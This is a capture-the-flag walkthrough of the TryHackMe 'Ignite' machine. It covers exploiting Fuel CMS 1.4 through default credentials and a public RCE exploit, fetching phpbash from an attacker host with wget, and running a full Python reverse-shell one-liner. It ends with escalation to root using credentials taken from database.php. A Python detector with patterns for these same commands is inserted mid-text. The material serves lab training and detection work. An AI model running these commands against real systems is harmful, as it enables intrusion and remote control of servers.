We begin with a simple nmap scan on the target. One of our key findings is a homepage that lands us on “Welcome to Fuel CMS”, running version 1.4. Going through the main welcome page, we come across the default credentials admin:admin. We also run a dirb scan and find robots.txt and a /fuel directory where the login page is located. The default credentials do work and we log in to Fuel CMS, but we don't find anything interesting in it.
Now a MUST DO thing is to look for exploits for any CMS you find, and here we have the version as well. Simply Google “fuel cms exploit”, go to the first exploit and download it. This exploit allows Remote Code Execution.
We will have to make some minor changes to the exploit, like changing the IP address to our TryHackMe target's IP address and commenting out one line. Since we are not running this exploit through Burp, we have to comment out the line “proxy=xxxxx”, and in “r = requests.get” we keep only the burp01url and remove the proxy there as well. (If you have basic knowledge of Python, this is simple to understand.) So this is what our final exploit will look like:
Now crack open a terminal and type python “filename.py” (for me it is python fuel_exploit.py) and you will get a cmd shell. NICE!!! You can run commands like whoami and ls, but you will see that the shell seems broken and we get some PHP errors, so we need a better shell.
For a better shell, we can use this awesome script called phpbash, which gives us a semi-interactive shell in our browser itself. You can get it here
You can simply view it as raw and run wget on it in your terminal to download it. The usage is simple: after you download it (phpbash.php), start a simple Python HTTP server in the same directory using the command python -m SimpleHTTPServer 80. This runs a simple web server on our own machine so that we can upload/download files. Our plan is to go to our target shell and from there use wget to download the phpbash.php file using the command “wget AttackerIP/filename”.
Run this command in the cmd (the useless PHP shell on our target) and once done, run the “ls” command and you will see the file “phpbash.php”. NOW all we have to do is go to our browser's URL bar and type “targetIP/filename”. The image below will make it clear:
PATH TO ROOT
From here we can try to escalate privileges. HOWEVER, here's the twist: phpbash is not a real, proper terminal, so we will get errors and won't be able to escalate privileges. We need a real and proper shell. For this we run nc -nlvp 7777 in our terminal and run this Python reverse shell in our phpbash:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOURIPADDRESS",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Copy and paste this and run it in your phpbash. (You can easily get such reverse shells from GitHub repos like PayloadsAllTheThings or pentestmonkey.)
Great!!! We get a reverse connection on our netcat listener, and when we run the “whoami” command we see that we now have a reverse shell as “www-data”. However, this shell still won't do what we want it to, so we need a full TTY for an interactive shell. So enter this Python command:
python -c 'import pty; pty.spawn("/bin/bash")'
Then press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg
This will bring your shell back to the foreground with a full interactive experience.
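Seen from the defending side, the steps above (www-data fetching phpbash.php with wget, the python -c reverse shell, the pty upgrade) all show up as unusual child processes of the web server account. The sketch below is an added example, not part of the original walkthrough; the "user|parent|cmdline" event format, the rule names and the sample lines are constructed assumptions.

```python
import re

# Accounts that web servers typically run as; www-data is the one in this walkthrough.
WEB_USERS = {"www-data"}

# Rule names are hypothetical labels; patterns target the command lines seen above.
RULES = [
    ("tool-download", re.compile(r"\b(wget|curl)\b.*\.(php|sh|py)\b")),
    ("python-socket-shell", re.compile(r"\bpython[\d.]*\s+-c\b.*socket.*dup2")),
    ("pty-upgrade", re.compile(r"pty\.spawn")),
    ("interactive-shell", re.compile(r"/bin/(ba)?sh\s+-i\b")),
]

# Constructed sample events in a hypothetical "user|parent|cmdline" format.
SAMPLE = """\
www-data|apache2|php-fpm: pool www
www-data|sh|wget http://10.10.10.10/phpbash.php
root|bash|wget https://example.org/backup.php
www-data|sh|python -c import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",7777));os.dup2(s.fileno(),0)
www-data|python|/bin/sh -i
www-data|sh|python -c import pty; pty.spawn("/bin/bash")
deploy|sshd|python -c print("hello")
"""

def detect(text):
    """Return (line_number, rule_name) for every web-user event matching a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed lines instead of crashing
        user, _parent, cmdline = parts
        if user not in WEB_USERS:
            continue  # only the web server account is in scope for these rules
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((n, name))
    return hits

if __name__ == "__main__":
    for n, name in detect(SAMPLE):
        print(f"line {n}: {name}")
```

In a real deployment the same patterns would be fed from process-execution telemetry (auditd execve records, EDR events) normalised into whatever fields that pipeline provides.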
FINALLY we have a proper shell! We can try to escalate privileges manually and by using scripts, but we get no clue. Here's the twist: if you go to the main page where we got the default credentials admin:admin, there is this important piece of info which I had missed as well!
So the database.php file contains usernames and passwords. Simply go to that particular directory and cat database.php to read the info in it. (NOTE: if you are having trouble locating the file, run the command “locate database.php”.)
NOW just run the command “su” or “su root”, enter the password and you are ROOT! You will find the flag in the /root directory.
WE HAVE SUCCESSFULLY ROOTED IGNITE and found both flags. I hope you liked this walkthrough of Ignite and learned something. In case of any doubts, do check out this other writeup (https://exploits.run/ignite/).